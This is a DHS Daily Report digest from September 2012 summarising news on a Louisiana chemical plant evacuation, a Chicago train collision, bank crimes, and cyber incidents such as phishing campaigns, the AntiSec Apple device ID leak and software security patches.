Wednesday, September 5, 2012

Complete DHS Daily Report for September 5, 2012

Daily Report

Top Stories

• Law enforcement officials ordered the evacuation of homes and businesses within a half-mile of a storm-damaged chemical plant in Braithwaite, Louisiana, to guard against possible contamination or fire. – New Orleans Times-Picayune

7. September 3, New Orleans Times-Picayune – (Louisiana) Days after Isaac, homes near Stolthaven chemical plant in Braithwaite evacuated. Law enforcement officials ordered the evacuation of homes within a half-mile of a storm-damaged chemical plant in Braithwaite, Louisiana, to guard against possible contamination or fire, the New Orleans Times-Picayune reported September 3. A Louisiana State Police (LSP) spokeswoman said teams with the U.S. Environmental Protection Agency and the State Department of Environmental Quality were evaluating the Stolthaven New Orleans plant, which was without power since Hurricane Isaac flooded it. The reason for the evacuation days after the storm was not immediately clear, but the spokeswoman said the company alerted the LSP‘s hazardous materials division about potentially harmful and flammable chemicals inside. Plaquemines‘ east bank was already under a mandatory evacuation order from Isaac, but authorities worked September 3 to clear out the residents near the plant who had stayed anyway. A parish spokeswoman said police closed English Turn Road within the evacuation perimeter. The evacuation only affects homes and businesses along the levee, the LSP spokeswoman said. Source:

• A freight train struck the rear of another freight train in Chicago, derailing eight rail cars, and knocking out power to more than 2,500 people. – Associated Press

17. September 2, Associated Press – (Illinois) Freight train derailment in Chicago. A freight train struck the rear of another freight train in Chicago September 2, derailing eight full-sized rail cars and damaging a third freight train on an adjacent track, authorities said. Local reports said power was briefly knocked out to more than 2,500 people in the surrounding area. There were no immediate reports of any injuries following the derailment, a CSX rail spokesman said. At least one of the trains was carrying liquid waste, a Chicago fire official and media affairs director told the Chicago Sun-Times. One train formation bound from Nashville, Tennessee, to Chicago had two locomotives and 13 freight cars; another from Albany, New York, to Chicago had four locomotives and 93 freight cars and a third on a route from Flint, Michigan, to Chicago had two locomotives and 130 freight cars. The report said emergency crews initially called for a hazardous materials response as a precaution, but no hazardous materials were detected and no leaks discovered. Source:

• Hacker group AntiSec published what it claims is about 1 million unique device identifier numbers for Apple devices that it said it accessed earlier in 2012 from a computer belonging to an FBI agent. – Computerworld See item 40 below in the Information Technology Sector

• Three people were injured when a large four-wheel-drive truck veered out of control into the spectator area during a race in Harrisburg, Oregon. – Associated Press

53. September 2, Associated Press – (Oregon) Monster truck mishap in Ore. sends 3 to hospital. A large four-wheel-drive truck veered out of control during a race at Harrisburg MotorSports Complex in Harrisburg, Oregon, struck a barrier, and crossed into the spectator area, where three people were injured, authorities said. The three hurt September 1 were taken to a hospital, said a Linn County sheriff. Sheriff‘s officials said their injuries were not life-threatening. The 1975 Ford pickup, fitted with large tractor tires, had slowed to about 10 mph just before coming to a stop, the sheriff said. Emergency crews responded to the complex about 30 minutes after ―Monster Air 2012‖ began. The owner of the complex said numerous precautions had been taken to keep spectators safe. However, he said the truck‘s hydraulic steering went out suddenly during a two-truck race and that the driver could not stop it as it veered into the spectator area. He said about 1,000 people attended the event. Source:

• A spokeswoman for St. Tammany Parish, Louisiana, said officials were working to relieve pressure on Lock 2 on the Pearl River Diversion Canal that was in danger of failing and flooding homes. – Associated Press

61. September 1, Associated Press – (Louisiana) Evacuation called near Pearl River diversion canal; parish works to ease pressure on lock. A spokeswoman for St. Tammany Parish, Louisiana, said officials were working to relieve pressure on Lock 2 on the Pearl River Diversion Canal that was in danger of failing and flooding homes near a canal that branches off the Pearl River. An evacuation was ordered the evening of September 1 for part of rural St. Tammany. The order affected as many as 2,000 people. Area waterways were swollen because of heavy rains from Hurricane Isaac. The State said the U.S. Army Corps of Engineers operates the lock. The parish spokeswoman said the parish got permission from the Corps to relieve pressure on the structure by opening a valve that will allow a controlled flow of water through it. Source:


Banking and Finance Sector

10. September 4, Help Net Security – (International) Fake AmEx ‘security verification’ phishing emails doing rounds. Malicious spam emails impersonating American Express (AmEx) have been hitting inboxes in the last few days, trying to make recipients open an attached HTML file to gather personal information, Help Net Security reported September 4. The email purports to be a notification about a ―Membership Security Verification,‖ and warns the users that a ―slight error‖ has been detected in their AmEx accounts. To make it right — and not lose access to their accounts in the next 48 hours — the victims are urged to download the attached HTML file and open it in a browser. The phishers are looking for every bit of personal and financial data they can get, including the users‘ name, address, home and work telephone numbers, Social Security number, mother‘s maiden name and date of birth, users‘ date of birth, AmEx credit card number, expiration date, card security code, ATM PIN, email address, and the password for it. All of the information submitted on the fake form will be sent to online criminals and subsequently used to steal the identities of victims as well as use their credit card details to conduct fraudulent transactions, according to Hoax-Slayer. Source:

11. September 3, WJAC 6 Johnstown – (Pennsylvania) Man accused of trying to kidnap bank manager surrenders to authorities inside bar. A fugitive wanted for the attempted kidnapping of a bank manager in Emporium, Pennsylvania, during August was spotted inside a bar and turned himself in to police September 3. Court documents said that August 8 the man tried abducting the bank manager who worked at the branch that foreclosed on his house. The woman escaped unharmed and the man had been on the run since the incident. He was arraigned on kidnapping, aggravated assault, terrorist threats, unlawful restraint, false imprisonment, reckless endangerment, and disorderly conduct charges and was booked into the Potter County Jail. Borough police, State police, and the FBI were still looking into the incident. Source:

12. September 1, Arizona Daily Star – (Arizona) Tucson bank robbery suspect turns himself in to authorities. A man who was connected to a string of bank robberies in the Tuscon, Arizona area during August was arrested September 1 after turning himself in, police said. The man was booked into Pima County jail on three counts of robbery after he was accused of holding up a Pima Federal Credit Union August 21. According to police, the suspect threatened a bank teller with a note before fleeing with an undisclosed amount of money. He is also facing charges for two other robberies on the city‘s northwest side. Authorities also connected him with at least one robbery in the Phoenix area. Source:

13. September 1, McAllen Monitor – (Texas) Man convicted of credit card scheme. One of the men behind a high-tech credit card scheme operating out of McAllen, Texas, pleaded guilty to federal fraud charges and is awaiting sentencing, the McAllen Monitor reported September 1. The man admitted to possessing various debit and bank account numbers. The U.S. Secret Service brought federal fraud charges against him and other defendants in July after police discovered hundreds of fraudulent credit cards, gift cards, computers, cocaine, steroids, thousands of dollars in cash, and other brand new electronics at two apartments in McAllen, a criminal complaint stated. During the investigation, authorities found that he had more than $130,000 in a U.S. bank. Source:

14. August 31, KCBS 2 Los Angeles – (California) ‘Haggler Bandit’ allegedly linked to series of bank robberies in 10 days. The so-called ―Haggler Bandit‖ allegedly struck again in Los Angeles August 31, robbing a bank and attempting to steal from another, according to the FBI. The suspect reportedly robbed a Citibank branch and tried to steal from a Chase bank. Authorities said he threatened tellers with a gun in the attempted robbery. August 30, the bandit robbed a Chase bank in Monrovia and attempted to rob a Wells Fargo branch in Pasadena. The incidents started August 22 at a Citibank in Pasadena. The ―Haggler Bandit‖ was given the nickname by bank tellers who said he ―haggled‖ over the amount of money he expected to get based on his demand for cash. Source:

Information Technology Sector

38. September 4, The H – (International) VMware secures server products. VMware released an advisory, VMSA-2012-0013, which addresses vulnerabilities in open source components in its VMware vCenter 4.1, VMware vCenter Update Manager 4.1, VMware ESX and ESXi, and VMware vCOps 5.0.2 or earlier. Among the upgraded components are OpenSSL, Perl, libxm2, and the Linux kernel. Source:

39. September 4, The H – (International) Google suspicious sign-in alert contains a trojan. Unknown attackers are attempting to persuade email recipients to open attachments that contain a trojan by claiming to be from The Google Accounts Team. A new email supposedly from ―accounts-noreply@google(dot)com‖ with the subject ―Suspicious sign in prevented‖ is being sent en masse, claiming a hijacker attempted to access the mail recipient‘s Google Account. The message says the sign-in attempt was prevented but asks users to refer to the attached file for details of the attempted intrusion. However, instead of containing information such as the IP address of the log-in attempt, the attached zip file contains a Windows executable file that will install a trojan onto a victim‘s system. While Google does sometimes send emails like this to users, they never contain attachments; users that receive such an email are advised to delete them. According to VirusTotal, the trojan is currently only detected by just half of 42 anti-virus programs used by the online virus scanner service. Source:

40. September 4, Computerworld – (International) Hacker group claims access to 12M Apple device IDs. Hacker group AntiSec published what it claims is about 1 million unique device identifier numbers (UDIDs) for Apple devices that it said it accessed earlier in 2012 from a computer belonging to an FBI agent. The group, which is a splinter operation of the Anonymous hacking collective, claims it culled more than 12 million UDIDs and personal data linking the devices to users from the FBI computer. AntiSec said it chose to publish a portion of those records to prove it has them. In a note on Pastebin, a member of AntiSec said the group culled some personal data such as full names and cell numbers from the published data. Instead, the group said it published enough information such as device type, device ID, and Apple Push Notification Service tokens to let users determine whether their devices are on the list. It was not immediately possible to verify the authenticity of AntiSec‘s claims about the data. Source:

41. September 3, The Register – (International) Firefox, Opera allow crooks to hide an entire phish site in a link. A shortcoming in browsers including Firefox and Opera allows cyber criminals to hide an entire malicious Web page in a clickable link — ideal for fooling victims into handing over passwords and other sensitive data. Usually, phishing attacks rely on tricking users into visiting Web sites designed by criminals to masquerade as banks and online stores, thus stealing their credentials and bank account details when they try to use the bogus pages. However, this requires finding somewhere to host the counterfeit sites, which are often quickly taken down by hosting companies and the authorities or blocked by filters. Instead, the malicious Web pages can be stored in data uniform resource identifiers (URIs), not to be confused with URLs — which place the Web code into a string that when clicked on, instructs the browser to unpack the payload and present it as a page. It negates the need to find a place for a hacker‘s malicious page, and once shortened using a service such as TinyURL, the URI can be reduced to a small URL, perfect for passing around social networks, online chats, and email. Crooks may need to set up a server to receive data from victims, however. Source:

42. September 3, The Inquirer – (International) Hackers claim Sony Mobile scalps. A group of hackers claimed it seized control of eight Sony servers because of the firm‘s lax security. The group called Null Crew made the claim on Twitter and via a Pastebin release. The release shows a list of usernames and passwords that apparently relate to, and a message to Sony that accuses the firm of not having strong enough security credentials. Source:

43. September 3, IDG News Service – (International) Rogue Microsoft Services Agreement emails lead to latest Java exploit. Hackers are distributing rogue email notifications about changes in Microsoft‘s Services Agreement to trick people into visiting malicious pages that use a recently circulated Java exploit to infect their computers with malware. The rogue email messages are copies of legitimate notifications that Microsoft sent out to users to announce changes to the company‘s Services Agreement that will take effect October 19. However, in the malicious versions of the emails, the correct links were replaced with links to compromised Web sites that host attack pages from the Blackhole exploit toolkit. Source:

44. August 31, The Register – (International) Philips databases pillaged and leaked second time in a month. Electronics giant Philips was hacked for the second time in a month and its databases raided. Usernames and encrypted passwords were leaked after the breach. It is unclear whether email addresses or the actual contents of corporate emails were included in the records dumped from the company‘s SQL databases. The lifted data was uploaded to various file hosting sites by hacktivists, who used blogs (since taken down by Google‘s Blogspot service) and social networks, using the hashtag labels ―AntiSec‖ and ―LulzSecReborn‖ to spread the word. ―All together there is [sic] well over 200,000 emails with at least 1,000 of them have further vital credentials that could allow others to use the users‘ personal information,‖ according to a Web site run by Anonymous. The site reports that Anonymous-affiliated hackers in Sweden announced the raid. The latest attack follows a smaller leak of a few thousand records from Philips by r00tbeersec, another hacktivist crew, about a week ago. Source:

45. August 31, The H – (International) Chrome 21 update closes high-risk security holes. Three high-severity holes were fixed in Google‘s latest stable channel update to the Chrome Web browser. Version 21.0.1180.89 of Chrome for Windows, Mac OS X, and Linux addresses nine vulnerabilities in the Web browser, and fixes a number of non-security issues with Flash, developer tools, and gradient boxes. The high severity vulnerabilities include two incidents of bad casting, when handling XSL transforms and run-ins, and a stale buffer appearing when loading URLs. Additionally, the update fixes three medium-risk and three low-risk issues. Source:

For another story, see item 10 above in the Banking and Finance Sector

Communications Sector

Nothing to report